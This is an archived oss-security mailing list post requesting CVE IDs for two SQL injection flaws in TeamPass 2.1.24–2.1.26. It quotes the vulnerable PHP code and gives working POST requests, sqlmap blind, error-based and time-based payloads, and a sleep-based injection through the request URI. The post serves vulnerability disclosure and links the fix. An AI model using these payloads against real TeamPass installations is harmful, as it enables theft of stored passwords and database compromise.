Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Message-ID: <CAAjTPb_5q38hwdLzjNP+ejfhLvpNP7ny_tzCGF9diJf1zh1Pxw@mail.gmail.com>
Date: Mon, 11 Jul 2016 11:14:02 +0800
From: das das <scusec2010@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE request:SQL injections in TeamPass

Hello,

I'd like to request CVE IDs for these issues. They were found in
TeamPass(www.teampass.net).
All the issues are found in TeamPass (2.1.26, 2.1.25, 2.1.24).
fixed:https://github.com/nilsteampassnet/TeamPass/commit/7bf6c63c4727a6ba9d65610e59ccbc25527a6fca

Issues detail:
#1: SQL injection vectors in sources/items.queries.php

-------------------------code_start TeamPass-2.1.26-------------------------
case "send_email":
            if ($_POST['key'] != $_SESSION['key']) {
                echo '[{"error" : "something_wrong"}]';
                break;
            } else {
                if (!empty($_POST['content'])) {
                    $content = explode(',', $_POST['content']);
                }
                // get links url
                if (empty($_SESSION['settings']['email_server_url'])) {
                    $_SESSION['settings']['email_server_url'] =
$_SESSION['settings']['cpassman_url'];
                }
                if ($_POST['cat'] == "request_access_to_author") {
                    $dataAuthor = DB::queryfirstrow("SELECT
email,login FROM ".prefix_table("users")." WHERE id= ".$content[1]);
                    $dataItem = DB::queryfirstrow("SELECT label FROM
".prefix_table("items")." WHERE id= ".$content[0]);
                    $ret = @sendEmail(
                        $LANG['email_request_access_subject'],
                        str_replace(array('#tp_item_author#',
'#tp_user#', '#tp_item#'), array(" ".addslashes($dataAuthor['login']),
addslashes($_SESSION['login']), addslashes($dataItem['label'])),
$LANG['email_request_access_mail']),
                        $dataAuthor['email']
                    );
                } elseif ($_POST['cat'] == "share_this_item") {
                    $dataItem = DB::queryfirstrow("SELECT
label,id_tree FROM ".prefix_table("items")." WHERE id=
".$_POST['id']);
                    // send email
                    $ret = @sendEmail(
                        $LANG['email_share_item_subject'],
                        str_replace(
                            array('#tp_link#', '#tp_user#', '#tp_item#'),

array($_SESSION['settings']['email_server_url'].'/index.php?page=items&group='.$dataItem['id_tree'].'&id='.$_POST['id'],
addslashes($_SESSION['login']), addslashes($dataItem['label'])),
                            $LANG['email_share_item_mail']
                        ),
                        $_POST['receipt']
                    );
                }
                echo '[{'.$ret.'}]';
            }
            break;
-------------------------code_end TeamPass-2.1.26--------------------------

In the "send_email" request, when the condition "$_POST['cat'] ==
"share_this_item"" is successful, the POST parameter "id" is unescaped
which leads to sql injection. while is checks the sessions at the
beginning of the script and needs the authority of normal user to
access to the page. To execute the SQL query,it verifies that if the
the post parameter'key' equals session['key'].We can get the key
through thisway：refresh the page(e.g index.php?page=items), capture
the packet using tools (e.g Burp Suit), and forward the packet,then we
canget the value of session 'key' in the request body.
e.p
http://localhost:8088/code_audit/TeamPass/sources/items.queries.php
POST:
type=send_email&key=wiesu2Gae8shaeNgeengeiha2aic2ohghainia1laeyi9doh6G&cat=share_this_item&id=1*
Sqlmap payload:
sqlmap identified the following injection point(s) with a total of 406
HTTP(s) requests:
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY
or GROUP BY clause
    Payload: type=send_email&key=wiesu2Gae8shaeNgeengeiha2aic2ohghainia1laeyi9doh6G&cat=share_this_item&id=1
RLIKE (SELECT (CASE WHEN (7565=7565) THEN 1 ELSE 0x28 END))

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (EXTRACTVALUE)
    Payload: type=send_email&key=wiesu2Gae8shaeNgeengeiha2aic2ohghainia1laeyi9doh6G&cat=share_this_item&id=1
AND EXTRACTVALUE(4196,CONCAT(0x5c,0x7162766271,(SELECT
(ELT(4196=4196,1))),0x716b706271))

    Type: AND/OR time-based blind
    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    Payload: type=send_email&key=wiesu2Gae8shaeNgeengeiha2aic2ohghainia1laeyi9doh6G&cat=share_this_item&id=1
AND 7783=BENCHMARK(5000000,MD5(0x44794d4a))
---


#2: SQL injection vectors in
includes/libraries/Database/Meekrodb/db.class.php

-------------------------code_start TeamPass-2.1.26-------------------------
// ----- BEGIN ERROR HANDLING
    if (!$sql || $db->error) {
      if ($this->error_handler) {
        $db_error = $db->error;
        $db_errno = $db->errno;
$db->query(
"INSERT INTO ".$GLOBALS['pre']."log_system SET
date=".time().",
qui=".$_SESSION['user_id'].",
label='Query: ".addslashes($sql)."<br />Error:
".addslashes($db_error)."<br />@ ".$_SERVER['REQUEST_URI']."',
type='error'",
MYSQLI_USE_RESULT
);
-------------------------code_end TeamPass-2.1.26--------------------------
When a database error occurs, these codes above will be excuted.
However, the variable "$_SERVER['REQUEST_URI']" is unescaped and
controled by us which lead to a sql injection. First we need to find a
place where database error occurs, such as
"sources/import.queries.php". It needs a normal user authority to
access to the page. Then use the burpsuit to access the page to avoid
the urlencode by browsers.
e.p
http://localhost:8088/TeamPass/sources/import.queries.php?'or/**/sleep(5)/**/or'1
POST:
type=import_items&data=&folder=1
And the sql log is as below. It is a time-based sql injection.
-------------------------log_start-------------------------
Query INSERT INTO teampass_log_system SET
date=1466674179,
qui=10000001,
label='Query: INSERT INTO `teampass_items`
(`label`,`description`,`pw`,`pw_iv`,`url`,`id_tree`,`login`,`anyone_can_modify`)
VALUES (\'\', NULL, \'\', \'dfd7c5279cdd697c08b627aeaaf15999\', NULL,
\'1\', NULL, 0)<br />Error: Column \'description\' cannot be null<br
/>@ /code_audit/TeamPass/sources/import.queries.php?'or/**/sleep(5)/**/or'1',
type='error'
-------------------------log_end---------------------------


These issues were discovered by wps2015[D.A.S] of Information Security
Institute @ Sichuan University.

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.